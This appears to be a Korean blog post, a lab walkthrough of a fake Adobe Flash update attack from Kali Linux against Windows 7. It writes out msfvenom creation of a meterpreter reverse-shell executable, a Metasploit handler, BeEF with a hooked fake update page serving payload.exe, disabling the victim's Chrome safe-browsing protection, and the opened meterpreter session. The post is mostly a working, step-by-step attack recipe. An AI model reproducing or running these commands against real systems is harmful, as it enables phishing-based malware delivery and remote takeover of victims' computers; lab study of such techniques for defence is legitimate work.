- 사용 시스템
KaliLinux
Window 7
- adobe flash fake update
(kail)
- 페이로드 생성
# cd /var/www/html
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.27.50 LPORT=4444 \
-f exe -o payload.exe
# ls
|
index.html payload.exe |
|
[TERM1]
# msfconsole
|
msf > load msgrpc Pass=abc123 [*] MSGRPC Service: 127.0.0.1:55552 [*] MSGRPC Username: msf [*] MSGRPC Password: abc123 [*] Successfully loaded plugin: msgrpc msf > msf > use exploit/multi/handler msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LHOST 192.168.27.50 LHOST => 192.168.27.50 msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.27.50 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.27.50:4444 [*] Starting the payload handler... |
|
[TERM2]
# cd /usr/share/beef-xss
# ./beef -x
|
[20:43:56][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000]. [20:43:56][*] Browser Exploitation Framework (BeEF) 0.4.7.0-alpha [20:43:56] | Twit: @beefproject [20:43:56] | Site: http://beefproject.com [20:43:56] | Blog: http://blog.beefproject.com [20:43:56] |_ Wiki: https://github.com/beefproject/beef/wiki [20:43:56][*] Project Creator: Wade Alcorn (@WadeAlcorn) [20:43:57][*] Successful connection with Metasploit. [20:44:01][*] Loaded 297 Metasploit exploits. [20:44:01][*] Resetting the database for BeEF. [20:44:02][*] BeEF is loading. Wait a few seconds... [20:44:20][*] 13 extensions enabled. [20:44:20][*] 550 modules enabled. [20:44:20][*] 3 network interfaces were detected. [20:44:20][+] running on network interface: 127.0.0.1 [20:44:20] | Hook URL: http://127.0.0.1:3000/hook.js [20:44:20] |_ UI URL: http://127.0.0.1:3000/ui/panel [20:44:20][+] running on network interface: 192.168.17.50 [20:44:20] | Hook URL: http://192.168.17.50:3000/hook.js [20:44:20] |_ UI URL: http://192.168.17.50:3000/ui/panel [20:44:20][+] running on network interface: 192.168.27.50 [20:44:20] | Hook URL: http://192.168.27.50:3000/hook.js [20:44:20] |_ UI URL: http://192.168.27.50:3000/ui/panel [20:44:20][*] RESTful API key: 4633f1e85c608a41c26864e550860f9372997d36 [20:44:20][*] HTTP Proxy: http://127.0.0.1:6789 [20:44:20][*] BeEF server started (press control+c to stop) |
|
[TERM3]
# cd /var/www/html
# vi index.html
|
<DOCTYPE html> <html> <head> <title>Adobe flash</title> <script src="http://192.168.27.50:3000/hook.js"></script> </head> <body><center> <img src="adobe.png" alt="adobe" width="204" length="204"> <p> <input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download') return false;"/> </p> </body> </html> |
|
> adobe.png 를 적당히 하나 다운 받습니다.
# ls
|
adobe.png index.html payload.exe |
|
# service spache2 restart
# firefox http://192.168.27.50:3000/ui/panel &
ID beef PASS beef
(win7)
크롬 "chrome://settings/" > 고급 > 위험한 사이트로부터 사용자와 기기 보호 해제
http://192.168.27.50 접속
> 등록한 사진과 버튼이 보인다.
(kali)
Command > Social Engineering > Fake Flash Update > execute
Image : http://192.168.27.50:300/adobe/flash_update.png
Payload : Custom_Payload
Custom Payload URL : http://192.168.27.50/payload.exe
(win7)
> 감쪽같은 창이 뜨고 INSTALL을 누르면
> payload.exe가 설치된다. 그리고 payload를 실행하면 msfconsole에 연결됩니다.
(kali)
[TERM1]
|
[*] Sending stage (957487 bytes) to 192.168.27.202 [*] Meterpreter session 1 opened (192.168.27.50:4444 -> 192.168.27.202:49778) at 2017-11-13 21:05:36 +0900 meterpreter > meterpreter > sysinfo Computer : ADMINSTRATOR-PC OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x64 System Language : ko_KR Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.27.202 - Meterpreter session 1 closed. Reason: User exit |
|
> 연결되어 권한을 얻었다.
'Security > 정보 수집' 카테고리의 다른 글
| Password Crack ( John The Ripper) (0) | 2017.11.13 |
|---|---|
| [종합] Fake Site 구성하기 (0) | 2017.11.13 |
| BeEF 와 MSF 같이 사용하기 (0) | 2017.11.13 |
| 웹 브라우저 해킹 ( BeEF XSS ) (0) | 2017.11.13 |
| Armitage 사용하기 (0) | 2017.11.12 |
